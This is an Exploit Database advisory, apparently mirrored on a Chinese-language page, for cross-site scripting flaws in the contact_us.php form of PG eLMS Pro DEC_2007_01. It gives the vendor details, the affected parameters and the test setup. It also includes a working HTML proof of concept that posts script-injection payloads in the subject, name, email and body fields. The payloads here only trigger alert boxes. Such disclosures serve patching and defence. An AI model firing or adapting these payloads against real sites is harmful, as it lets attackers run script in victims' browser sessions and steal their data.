PG eLms Pro vDEC_2007_01 – ‘contact_us.php’ Multiple POST Cross-Site Scripting Vulnerabilities

• Exploit Database
• 123 阅读

• 作者： LiquidWorm
  日期： 2011-07-14
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/17531/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57

  <!--   PG eLMS Pro vDEC_2007_01 (contact_us.php) Multiple POST XSS Vulnerabilities   Vendor: PilotGroup Ltd Product web page: http://www.elmspro.com Affected version: DEC_2007_01   Summary: eLMS Pro solution is an outstanding and yet simple Learning Management system. Our product is designed for any education formations: from small distance training companies up to big colleges and universities. The system allows to build courses, import SCORM content, deploy online learning, manage users, communicate with users, track training results, and more.   Desc: Input passed via the &apos;subject&apos;, &apos;name&apos;, &apos;email&apos; and &apos;body&apos; parameters to &apos;contact_us.php&apos; script is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user&apos;s browser session in context of an affected site.     Tested on: Microsoft Windows XP Professional SP3 (EN) Apache 1.3.27 (Win32) PHP 5.2.4 MySQL 14.14 Distrib 5.1.43 (Win32-ia32)     Vulnerability discovered by Gjoko &apos;LiquidWorm&apos; Krstic liquidworm gmail com Zero Science Lab     Advisory ID: ZSL-2011-5027 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5027.php       08.07.2011   -->     <html> <title>PG eLMS Pro vDEC_2007_01 (contact_us.php) Multiple POST XSS Vulnerabilities</title> <body bgcolor="#1C1C1C"> <script type="text/javascript">function xss1(){document.forms["xss"].submit();}</script> <form action="http://localhost:6450/contact_us.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss"> <input type="hidden" name="send" value="1" /> <input type="hidden" name="subject" value=&apos;"><script>alert(1)</script>&apos; /> <input type="hidden" name="name" value=&apos;"><script>alert(2)</script>&apos; /> <input type="hidden" name="email" value=&apos;"><script>alert(3)</script>&apos; /> <input type="hidden" name="body" value=&apos;1&lt;/textarea&gt;"><script>alert(4)</script>&apos; /> </form> <a href="javascript: xss1();" style="text-decoration:none"> <b><font color="red"><center><h3><br /><br />Exploit!<h3></center></font></b></a> </body> </html>